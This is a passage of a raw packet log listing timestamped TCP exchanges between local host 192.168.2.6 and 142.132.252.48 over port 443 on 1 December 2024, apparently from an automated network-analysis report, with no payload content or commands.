                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.417831898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.417855978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.417917013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.417934895 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.417980909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.417980909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.422837973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.422864914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.422938108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.422939062 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.422946930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.422990084 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.424397945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.484730959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.484750986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.484839916 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.484850883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.484913111 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.489697933 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.489715099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.489797115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.489809990 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.489864111 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.506627083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.521397114 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.521419048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.521534920 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.521547079 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.521590948 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.526972055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.526988983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.527049065 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.527057886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.527105093 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.532542944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.532560110 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.532629013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.532636881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.532684088 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.538290024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.538307905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.538361073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.538368940 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.538391113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.538412094 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.556061029 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.623848915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.623873949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.623923063 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.623934984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.623986959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.623986959 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.629268885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.629291058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.629336119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.629343987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.629386902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.629386902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.650767088 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.686764002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.686784029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.686836004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.686846972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.686896086 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.686971903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.692840099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.692862034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.692914009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.692926884 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.692950964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.692981005 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.698712111 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.723177910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.723197937 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.723243952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.723253965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.723298073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.728884935 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.728905916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.728948116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.728961945 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.728988886 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.729001045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.733906984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.733925104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.733973980 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.733983040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.734033108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.734033108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.739604950 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.739623070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.739677906 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.739687920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.739726067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.739726067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.754369974 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.881036043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.881169081 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.881175995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.881191969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.881251097 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.886588097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.886606932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.886667013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.886681080 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.886694908 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.886749983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.914854050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.914880991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.914911032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.914928913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.914962053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.915000916 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.920741081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.920758963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.920816898 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.920831919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.920845032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.920887947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.926018953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.926035881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.926121950 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.926136971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.926207066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.931888103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.931907892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.931956053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.931967020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.932007074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.932007074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.936526060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.936547995 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.936585903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.936594009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.936625004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.936638117 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.937441111 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.942145109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.942162991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.942224026 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.942233086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.942267895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.942267895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:39.987234116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.082596064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.082624912 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.082701921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.082729101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.082766056 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.082766056 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.087883949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.087903976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.088041067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.088063955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.088161945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.118768930 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.118791103 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.118913889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.118938923 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.119045019 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.124294043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.124313116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.124377966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.124393940 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.124433041 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.130278111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.130300045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.130354881 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.130368948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.130445957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.135087967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.135142088 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.135162115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.135179043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.135210991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.135416985 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.141196966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.141220093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.141268969 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.141287088 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.141330957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.146563053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.146580935 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.146653891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.146671057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.146752119 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.147831917 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.284013987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.284038067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.284169912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.284198999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.284285069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.289088964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.289104939 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.289242983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.289269924 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.289315939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.319967031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.319992065 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.320089102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.320105076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.320148945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.325584888 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.325602055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.325675964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.325695992 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.325738907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.331245899 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.331263065 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.331332922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.331352949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.331509113 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.336250067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.336272001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.336337090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.336354017 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.336395025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.336395025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.342061996 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.342080116 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.342156887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.342178106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.342215061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.347512960 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.347528934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.347604036 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.347620964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.347670078 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.486028910 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.486064911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.486134052 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.486161947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.486177921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.486211061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.490715027 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.490731001 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.490825891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.490845919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.490992069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.521214962 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.521244049 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.521322012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.521352053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.521380901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.521406889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.526983976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.527002096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.527134895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.527158976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.530674934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.532526970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.532543898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.532618046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.532635927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.534719944 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.538225889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.538242102 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.538333893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.538348913 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.538835049 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.543426991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.543442011 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.543515921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.543534040 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.546653032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.548826933 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.548842907 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.548913002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.548927069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.550770044 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.686717033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:40.686738014 CET44349721142.132.252.48192.168.2.6
